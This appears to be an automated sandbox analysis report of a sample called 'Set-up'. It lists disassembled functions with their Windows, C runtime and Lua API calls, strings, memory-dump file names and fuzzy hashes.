Function 00BE1AF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C38448,00000000), ref: 00BE1B65
luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BE1B7D
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BE1B94

Strings

version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BE1B8E
multiple Lua VMs detected, xrefs: 00BE1B77

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_setfuncs
String ID: multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
API String ID: 2970048142-3403695784
Opcode ID: 1ce51f7852779235a3e68c34a8dcd7cdf1ba0d47b0fdb27992c194c5ddbd9f75
Instruction ID: a43834fbe3769fd0dff845236c3d874c0fa507d6a747c46b852f203736eaa385
Opcode Fuzzy Hash: 1ce51f7852779235a3e68c34a8dcd7cdf1ba0d47b0fdb27992c194c5ddbd9f75
Instruction Fuzzy Hash: C01129B1A0071467C6107F28C846B5A77D4EF00714F208AD8FD95972D2FF7599198BCA

Function 00BDA9D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

lua_getstack.SET-UP(?,00BDA842,?,?), ref: 00BDA9EC
lua_getinfo.SET-UP(?,00C5F488,?,?,?,?), ref: 00BDAA02

Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE2315
Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE235B

lua_pushfstring.SET-UP(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 00BDAA1C
lua_pushfstring.SET-UP(?,00C62FE3,?,?,?), ref: 00BDAA39

Strings

%s:%d: , xrefs: 00BDAA16

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: lua_pushfstringstrchr$lua_getinfolua_getstack
String ID: %s:%d:
API String ID: 2558581977-2688275532
Opcode ID: f871eb5b18f5f60393d27602928e78fe5c3a935e6d79d2693afb6a6079219d63
Instruction ID: 7bde1c8dbd5d306d07b7e22c7a75ebe9ef2adc92cef463f87cabd3da0875f9be
Opcode Fuzzy Hash: f871eb5b18f5f60393d27602928e78fe5c3a935e6d79d2693afb6a6079219d63
Instruction Fuzzy Hash: 4A016231A0551CAB8B01FBA89D02DFFB3ECDF05305F1041AAFD05A7252EB259B1987E6

Function 00BDAF30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

lua_checkstack.SET-UP(?,?,?,?,?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF3B
luaL_error.SET-UP(?,stack overflow (%s),?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF5A

Part of subcall function 00BDAA50: luaL_where.SET-UP(?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA5B
Part of subcall function 00BDAA50: lua_pushvfstring.SET-UP(?,00BDA842,?,?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA68
Part of subcall function 00BDAA50: lua_concat.SET-UP(?,00000002,?,?,00BDA842,?,stack overflow), ref: 00BDAA73
Part of subcall function 00BDAA50: lua_error.SET-UP(?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA7C
Part of subcall function 00BDAA50: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,?,?,?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA98

Part of subcall function 00BDA9A0: lua_typename.SET-UP(?,?,?,?,?,?,?,?,00000000), ref: 00BDA9AE

luaL_error.SET-UP(?,stack overflow,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF65
luaL_argerror.SET-UP(?,?,value expected,?,?,?,?,?,stack overflow,?,00000000,?,?,00000004), ref: 00BDAFD2
lua_tolstring.SET-UP(?,?,?,?,?,?,?,value expected,?,?,?,?,?,stack overflow,?,00000000), ref: 00BDAFED

Strings

value expected, xrefs: 00BDAFC7
stack overflow, xrefs: 00BDAF5F
invalid option '%s', xrefs: 00BDAF0E
stack overflow (%s), xrefs: 00BDAF54

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_argerrorL_where_errnolua_checkstacklua_concatlua_errorlua_pushvfstringlua_tolstringlua_typename
String ID: invalid option '%s'$stack overflow$stack overflow (%s)$value expected
API String ID: 3599489640-40620427
Opcode ID: e0255988457d65e5297b11b1ae0b733a1f70a1b538d206701617c3d899589a0b
Instruction ID: debdfc66ed909dd9a4a0be7a06b62fc1b7fcf75ff7a857ac140bb57c3397c02b
Opcode Fuzzy Hash: e0255988457d65e5297b11b1ae0b733a1f70a1b538d206701617c3d899589a0b
Instruction Fuzzy Hash: 2CF03AB11082186B4B15AB15DC82DAEBBD8DA01354B1085E7FC18DB346FA30E95586AB

Function 00A75750 Relevance: 7.7, APIs: 5, Instructions: 249stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00A75807
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00A75865
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00A758D8

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strncmp
String ID:
API String ID: 1114863663-0
Opcode ID: e0ffb514176261c5276352c74498e19ec196370da01e7523dd3812be0255c676
Instruction ID: fd7818d019626e463cbacea5f1f02fed47b26e2de4385f5afa7fe7afaf109bf3
Opcode Fuzzy Hash: e0ffb514176261c5276352c74498e19ec196370da01e7523dd3812be0255c676
Instruction Fuzzy Hash: 2AA12C71D0051ACFCB25CF28DD84BA9B7B9EF44310F1082E9E91AA7295D771AE85CF80

Function 00A6D910 Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00A74900: memset.VCRUNTIME140 ref: 00A74929

ImmGetContext.IMM32(?), ref: 00A6DA1B
GetKeyboardLayout.USER32(00000000), ref: 00A6DA49
ImmEscapeW.IMM32(00000000,00000000,00001008,?), ref: 00A6DA59
ImmReleaseContext.IMM32(?,00000000), ref: 00A6DA78
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6DAAC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Context$EscapeKeyboardLayoutRelease_invalid_parameter_noinfo_noreturnmemset
String ID:
API String ID: 1657687289-0
Opcode ID: b1cd6cdb2d72ae108da9978fb457e3c023128ff3503141b4b868adae2fbbc19b
Instruction ID: 55ef7c5d74e2d3ae3e07ebcf8fb913eb1d015a7e21dce1c6c28d1a29850eed83
Opcode Fuzzy Hash: b1cd6cdb2d72ae108da9978fb457e3c023128ff3503141b4b868adae2fbbc19b
Instruction Fuzzy Hash: EA51A071E042089FDB14DFA8CD85BAEBBB5FF88354F14812DE816A7391DB30A945CB91

Function 00A96BB0 Relevance: 7.6, APIs: 5, Instructions: 144COMMON

Download Yara Rule

APIs

?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96BCA
?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96BDC
realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96CD8
realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96D11
?_Xbad_alloc@std@@YAXXZ.MSVCP140 ref: 00A96D1E

Part of subcall function 00A96DF0: ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(?,?,?,00000000,?,00A954B2,?,?,?,00A950C5,?,?,?,00000000,?,00A8F1C1), ref: 00A96E0A
Part of subcall function 00A96DF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000100,?,?,00000000,?,00A954B2,?,?,?,00A950C5,?,?,?,00000000), ref: 00A96E4D
Part of subcall function 00A96DF0: ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,00000000,?,00A8F1C1,?,?,00000000,00A8CC3A,?,?,00000000,?,00000000,?,?), ref: 00A96E5A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ?tolower@?$ctype@_W@std@@realloc$Xbad_alloc@std@@
String ID:
API String ID: 519369520-0
Opcode ID: 115e60fade84f5c06635c0d53106a6c2b4be3c5900a573550603b1066543d9f0
Instruction ID: d13660892d0d71d1eea2c7ab4bc361666cc84a52b9e55f049fd4777d5442cf50
Opcode Fuzzy Hash: 115e60fade84f5c06635c0d53106a6c2b4be3c5900a573550603b1066543d9f0
Instruction Fuzzy Hash: A65125B17002159FCB18DF19D480AA9BBE1FF48355B15C0AEE89E8B352D732D952CB90

Function 00A789F0 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,00C5D8CC), ref: 00A78AAD
memset.VCRUNTIME140 ref: 00A78ABA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000,00C5D8CC), ref: 00A78AFD
memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,00C5D8CC), ref: 00A78B05
memset.VCRUNTIME140 ref: 00A78B10

Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpymemset$_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 3375828981-0
Opcode ID: b563ca64ecdbbd49923aaa081f3860d3a342282dcd005f6ace7e7fcf9ee8026c
Instruction ID: e6266dfa958991159f6e880d7cd775c520fc3e2331e755328bf8dd090b258bc9
Opcode Fuzzy Hash: b563ca64ecdbbd49923aaa081f3860d3a342282dcd005f6ace7e7fcf9ee8026c
Instruction Fuzzy Hash: 8E411772A00118ABCB15DF68DC846AEBBA5EF45390F1586AAF819DB381DF70DD1087A0

Function 00A75DD0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000040), ref: 00A75E8E
memcpy.VCRUNTIME140(00000010,?,?,00000000,?,00000000,?,?,00000040), ref: 00A75E9C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000040), ref: 00A75EDF
memcpy.VCRUNTIME140(00000000,00000040,00000000,?,?,00000040), ref: 00A75EE7
memcpy.VCRUNTIME140(?,?,?,00000000,00000040,00000000,?,?,00000040), ref: 00A75EF3

Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 996696-0
Opcode ID: ef60f9cd48e2138d247593ee83387c5bc5f738dcbd7b7ddaa12315204eead493
Instruction ID: 625d561d3186eb00c6728cf138871a110b3db0b541285994514e1dea95c96dbb
Opcode Fuzzy Hash: ef60f9cd48e2138d247593ee83387c5bc5f738dcbd7b7ddaa12315204eead493
Instruction Fuzzy Hash: C5411672900509ABCB05DF68DC809AEBBAAEF45350F2482A9F819DB345DBB1DE50C791

Function 00A963D0 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00A91714,?,?,?), ref: 00A9646B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00A91714,?,?,?,?,?,?,?,00A8F55A,?,?), ref: 00A96482
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00A91714,?,?,?), ref: 00A96498
memcpy.VCRUNTIME140(?,?,?), ref: 00A964B8
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00A91714,?,?,?), ref: 00A964D4

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2665656946-0
Opcode ID: 75a8baeae947244ca2a79d45d1ddc08118c7d4aa21ecd556961bc5ba6eb2eeeb
Instruction ID: cb043863fa40eed8d96c3e61deb9057d0ffb47fe28ded9645403879b226c1975
Opcode Fuzzy Hash: 75a8baeae947244ca2a79d45d1ddc08118c7d4aa21ecd556961bc5ba6eb2eeeb
Instruction Fuzzy Hash: B9310A73600018ABCB14DF5CDD859BEBBA5EFC5351719C269E9188B205EB31E914C7E1

Function 00A68430 Relevance: 7.6, APIs: 5, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00A68473
memset.VCRUNTIME140 ref: 00A68492
GetObjectW.GDI32(00000000,0000005C,?), ref: 00A684A8
CreateFontIndirectW.GDI32(?), ref: 00A684FE
SendMessageW.USER32(?,00000030,00000000,00000000), ref: 00A6850F

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$CreateDeleteFontIndirectMessageSendmemset
String ID:
API String ID: 1981032407-0
Opcode ID: 547462c9fe34e57f7eb79bbdbb2c2ad582cd819db51a8d8064cbab97e64456cd
Instruction ID: 658812d08721e2922d2ce612b0692ccecd48c51dd820c02cf0ad30aab9eeb997
Opcode Fuzzy Hash: 547462c9fe34e57f7eb79bbdbb2c2ad582cd819db51a8d8064cbab97e64456cd
Instruction Fuzzy Hash: D23117B1A00709EFDB14DFA4C845B6ABBB8FF08714F008569E91ADB690DB74E904CB50

Function 00A6B050 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

?__ExceptionPtrCreate@@YAXPAX@Z.MSVCP140(?,70576E16,?,00000000,?,00A667E0,00000000,?), ref: 00A6B086
?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(?,00A6B910,?,?,?,00A667E0,00000000,?), ref: 00A6B0A9
?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCP140(?,?,?,?,?,?,00A667E0,00000000,?), ref: 00A6B0C1
?__ExceptionPtrToBool@@YA_NPBX@Z.MSVCP140(?,?,?,?,?,?,00A667E0,00000000,?), ref: 00A6B0E3
?_XGetLastError@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,00A667E0,00000000,?), ref: 00A6B0F4

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Exception$Bool@@Create@@Destroy@@Error@std@@Execute_once@std@@LastUonce_flag@1@
String ID:
API String ID: 1966669179-0
Opcode ID: 1b4f266e811641144417628fd7d02edb34dbe1697ebf6e7e61b53f2a50d899f0
Instruction ID: ead89f9e398b38a5b8a8f61a0dcee99193a38efcc146df70d7980a6e933ab2f3
Opcode Fuzzy Hash: 1b4f266e811641144417628fd7d02edb34dbe1697ebf6e7e61b53f2a50d899f0
Instruction Fuzzy Hash: 61116DB5C00248ABDF00DFA8D909B9EBBB8EB04714F00456AE902E3251D7759618CBA2

Function 00A63490 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

__RTDynamicCast.VCRUNTIME140(?,00000000,00C61508,00C61548,00000000), ref: 00A634B5
CreatePatternBrush.GDI32(?), ref: 00A634C9
CreateSolidBrush.GDI32(000000FF), ref: 00A634D6
FillRect.USER32(?,?,?), ref: 00A63522
DeleteObject.GDI32(?), ref: 00A63529

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: BrushCreate$CastDeleteDynamicFillObjectPatternRectSolid
String ID:
API String ID: 3069335187-0
Opcode ID: aaa5dd3508e4899df3ed5febba6b2c6eb15f3aa5ab4bc903b47ce9fa3f35ef7d
Instruction ID: 9b06e9788c7659e49e993bb9ed90abe4ed60f306350a3a2182844f4712f83e9e
Opcode Fuzzy Hash: aaa5dd3508e4899df3ed5febba6b2c6eb15f3aa5ab4bc903b47ce9fa3f35ef7d
Instruction Fuzzy Hash: 9B111FB1E0030A9BCF10AFA5C84ABAEBFF8EF14711F154065F906A7251DA34DA05CBA1

Function 00A640F0 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A64125
DeleteObject.GDI32(00000000), ref: 00A6412A
CreateSolidBrush.GDI32(?), ref: 00A6413F
SelectObject.GDI32(?,00000000), ref: 00A6414C
Ellipse.GDI32(?,00000000,00000000,00000000,00000000), ref: 00A64181

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

